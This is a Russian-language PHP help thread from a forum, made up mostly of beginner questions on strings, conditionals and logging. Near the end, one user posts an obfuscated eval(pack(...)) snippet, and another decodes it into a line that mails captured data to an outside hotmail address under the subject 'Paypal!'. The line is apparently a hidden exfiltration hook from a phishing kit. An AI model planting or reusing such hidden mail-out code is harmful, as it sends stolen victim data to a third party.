[php] Новичкам: задаем вопросы

Discussion in 'PHP' started by _Great_, 26 May 2007.

Thread Status:
Not open for further replies.
  1. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,254
    Likes Received:
    1,147
    Reputations:
    886
    если нету php кода и надо просто подключить интерпретированный файл, то можно

    PHP:
    echo file_get_contents('http://site.ru/....');
     
    _________________________
  2. Metho

    Metho New Member

    Joined:
    18 Nov 2011
    Messages:
    204
    Likes Received:
    2
    Reputations:
    0
    php код есть, ожидание 30 сек перед включением 2 вложения :( не работает
    протокол не забыл :)
     
    #20262 Metho, 17 Mar 2012
    Last edited: 17 Mar 2012
  3. petryxa-mixa

    petryxa-mixa Member

    Joined:
    8 Jun 2010
    Messages:
    177
    Likes Received:
    7
    Reputations:
    0
    PHP:
    readfile()
     
  4. felix_v26

    felix_v26 New Member

    Joined:
    19 Mar 2011
    Messages:
    22
    Likes Received:
    0
    Reputations:
    0
    exec("ps -auxww",$output,$code);
    var_dump($output);
    я так понимаю это показыват процессы запущенные на php,
    а как можно посмотреть какие имено файлы запущены и их параметры?
     
  5. uCryNet

    uCryNet Member

    Joined:
    11 Mar 2012
    Messages:
    51
    Likes Received:
    13
    Reputations:
    5
    Блин. Проблема так и не решилась!
     
  6. Skofield

    Skofield Elder - Старейшина

    Joined:
    27 Aug 2008
    Messages:
    952
    Likes Received:
    318
    Reputations:
    52
    uCryNet, в чем проблема?
     
  7. Chaak

    Chaak Elder - Старейшина

    Joined:
    1 Jun 2008
    Messages:
    1,059
    Likes Received:
    1,067
    Reputations:
    80
    Какой сервер установлен? Как запускаешь?
     
  8. uCryNet

    uCryNet Member

    Joined:
    11 Mar 2012
    Messages:
    51
    Likes Received:
    13
    Reputations:
    5
    всёё. Связка апач+пых настроена была неправельно! Теперь всё работает!
     
  9. Кишин

    Кишин New Member

    Joined:
    5 Jul 2011
    Messages:
    42
    Likes Received:
    0
    Reputations:
    0
    Подсчитать слова в строке!

    Здраствуйте уважаемые знатоки :)
    Вот очередной мой вам вопрос:
    Первое: Как подсчитать сколько слов в строке? Все слова в строке разделены пробелом, ну в принципе можно сделать чтоб они были разделены любыми символоми, главное как это подсчитать, сколько там слов.
    И второе: Как потом каждое слово вывести отдельно, например
    echo "первое слово";
    echo "второе слово";
    echo "третье слово";

    P.S. Еслиб нужно были подсчитать и затем вывести слова которые с новое строки все записаны, это это проще простого, а вот когда они записаны в одну строку, вот это для меня сложно.

    Заранее благодарен.
     
  10. Chaak

    Chaak Elder - Старейшина

    Joined:
    1 Jun 2008
    Messages:
    1,059
    Likes Received:
    1,067
    Reputations:
    80
    По идее кол-во слов = кол-во пробелов + 1.
    А каждое слово в отдельности
    PHP:
    $Slova explode(' 'str_replace("\n"' ''какое-то предложение'));
    echo 
    'Количество слов: 'count($Slova).'<br />';
    var_dump($Slova);
     
  11. explosm

    explosm New Member

    Joined:
    9 Aug 2010
    Messages:
    33
    Likes Received:
    3
    Reputations:
    0
    Короче суть в том что при иф можно использовать конструкцию $kor=$kor; а я хочу использовать break; чтобы сразу вышло с фунцкии или continue; чтобы с ифа перескочило в конец функции, а оно мне выдает ошибку сервера.. в чем я не прав? почему так? :(

    PHP:
    <?php  
    function function4 ($item) {  
    $kor"товар"// корень слова
    $ok1 "а";    // первый вариант окончания
    $ok2 "ов";  //второй вариант окончания слова


    if (strlen($item) > 2) { 
        
    $item1 substr($item, -1);  
        
    $item2 substr($item, -2);
        }
    else { 
        
    $item1 $item2 $item;
        }
    if (
    $item1 == and $item2 != 11)   
       {continue;}  
    // вот тут я использовал континуе чтобы пропустить else вместо $kor=$kor; или можно вобще как-то пусто оставить
            
    else {  
                    if (
    $item1 and $item1 and $item2 != 12 and $item2 != 13 and $item2 != 14) {  
                    
    $kor $kor.$ok1; } 
                                else  {
    $kor $kor.$ok2;} 
                 }  
    print (
    "$item ");
    print (
    $kor); 

    $item=1;
    function4($item);  
    ?>
    вся проблема в слове конитуне кроится если поставить $kor=$kor; все ок.. а тут пишет ошибка сервера и вобще ниче не показывается не пойму почему..(((
     
    #20271 explosm, 18 Mar 2012
    Last edited: 18 Mar 2012
  12. Skofield

    Skofield Elder - Старейшина

    Joined:
    27 Aug 2008
    Messages:
    952
    Likes Received:
    318
    Reputations:
    52
    explosm, http://www.php.su/learnphp/cs/?cycles

    P. S. Ребят, но прежде, чем задвать такие вопросы попытайтесь, через не могу, хоть что-то почитать сначала. Спасибо.
     
    #20272 Skofield, 18 Mar 2012
    Last edited: 18 Mar 2012
    1 person likes this.
  13. explosm

    explosm New Member

    Joined:
    9 Aug 2010
    Messages:
    33
    Likes Received:
    3
    Reputations:
    0
    я читал, прошу, прощения то есть здесь оно неприменимо....(( я лол всем спасибо
     
  14. Kruzak

    Kruzak New Member

    Joined:
    21 Dec 2010
    Messages:
    126
    Likes Received:
    4
    Reputations:
    1
    в каких случаях использовать !empty либо isset ?
    я так понимаю isset проверяет объявлена ли переменная
    а !empty не пустое значение? получается при if $_GET лучше наваренное isset использовать
     
  15. daniel777

    daniel777 Member

    Joined:
    8 Jul 2010
    Messages:
    520
    Likes Received:
    90
    Reputations:
    37
    Если GET запрос будет передаваться html формой, то isset() не подойдет, так как при загрузке формы уже будет передан запрос(а это означает что переменная уже задана).
    Не знаю правильно ли это, но я всегда использую if($_GET[q]==''){
     
  16. mastaadon

    mastaadon New Member

    Joined:
    26 Mar 2009
    Messages:
    32
    Likes Received:
    0
    Reputations:
    0
    Пытался написать скрипт обработчик событий но зациклился на том как сравнить время. Скрипт должен обрабатывать события в соответствии с днем недели и системным временем. То есть типа
    PHP:
    <?php

    $time 
    date('H:i:s');
    $today date("l");
    if((
    $time 22:59:59)&&($today == 'Sunday')){
    echo 
    'Магазин закрыт';
    }
    else{
    echo 
    'Идите за покупками...';
    }

    ?>
    Буду признателен любой помощи
     
    #20276 mastaadon, 20 Mar 2012
    Last edited: 20 Mar 2012
  17. Chaak

    Chaak Elder - Старейшина

    Joined:
    1 Jun 2008
    Messages:
    1,059
    Likes Received:
    1,067
    Reputations:
    80
    PHP:
    if(date('H') >= 23 && date('l') == 'Sunday')
    ...
     
  18. Qwert321

    Qwert321 Banned

    Joined:
    25 Jan 2009
    Messages:
    33
    Likes Received:
    0
    Reputations:
    0
    Спасибо... вообщем написал код вроде не тормозит.
    PHP:
    <?php
    //Statistic logging...
    $ip=ip2long($_SERVER['REMOTE_ADDR']);
    $ref=urlencode($_SERVER['HTTP_REFERER']);
    $lang=urlencode($_SERVER['HTTP_ACCEPT_LANGUAGE']);
    $us_ag=urlencode($_SERVER['HTTP_USER_AGENT']);
    $req_url=urlencode($_SERVER['REQUEST_URI']);
    $crt_time=date("Y-m-d-H-i-s");
    $host='localhost';
    $database='database';
    $user='user';
    $pswd='passwd';
    mysql_connect($host$user$pswd) or die("Database connect error.");
    mysql_select_db($database) or die("Database select error.");
    mysql_query("INSERT INTO `log` (`ip`,`req_url`, `us_ag`, `ref`, `lang`,`first_login`) VALUES ('$ip', '$req_url','$us_ag','$ref','$lang','$crt_time') ON DUPLICATE KEY UPDATE `count`=`count`+1, `log_list`=('$crt_time','$req_url','$us_ag','$lang')");
    mysql_close();
    //End statistic logging.
    ?>
    БД:

    PHP:
    CREATE TABLE IF NOT EXISTS `log` (
      `
    idint(11NOT NULL auto_increment,
      `
    ipint(11NOT NULL,
      `
    last_timetimestamp NOT NULL default CURRENT_TIMESTAMP on update CURRENT_TIMESTAMP,
      `
    req_urlvarchar(500NOT NULL,
      `
    us_agvarchar(500NOT NULL,
      `
    refvarchar(500NOT NULL,
      `
    langchar(100NOT NULL,
      `
    first_logintimestamp NOT NULL default '0000-00-00 00:00:00',
      `
    countint(11NOT NULL default '0',
      
    PRIMARY KEY  (`id`),
      
    UNIQUE KEY `ip` (`ip`)
    ENGINE=MyISAM  DEFAULT CHARSET=utf8 PACK_KEYS=0 AUTO_INCREMENT=67 ;
    Хотелось бы детальный лог для отдельного ип... пробовал использовать тип таблицы ENUM и SET, но не понимаю как обновить данные и извлечь их от туда.
    Например создал колонку log_list тип enum с 3-мя значениями('timestamp','req_url','us_ag'), как при обновлении добавить туда эти значения и потом их извлечь?
     
    #20278 Qwert321, 20 Mar 2012
    Last edited: 21 Mar 2012
  19. lightangel

    lightangel New Member

    Joined:
    7 Nov 2011
    Messages:
    91
    Likes Received:
    3
    Reputations:
    -6
    Code:
    <?
    eval(pack("H*","2448695431203D20227072347840686F746D61696C2E636F6D223B0A247375626A656374203D202250617970616C21223B0A2468656164657273203D202246726F6D3A20204D722E707234783C7072347840686F746D61696C2E636F6D3E223B0A6D61696C2824486954312C20246D61696C7375626A2C202464617461293B"));
    ?>
    Any way to decode this? Website or something?

    I tried Google and found nothing.
     
  20. banned

    banned Banned

    Joined:
    20 Nov 2006
    Messages:
    3,325
    Likes Received:
    1,199
    Reputations:
    252
    change eval to echo
    PHP:
    $HiT1 "pr4x@hotmail.com";
    $subject "Paypal!";
    $headers "From:  Mr.pr4x<pr4x@hotmail.com>";
    mail($HiT1$mailsubj$data);
     
Loading...
Thread Status:
Not open for further replies.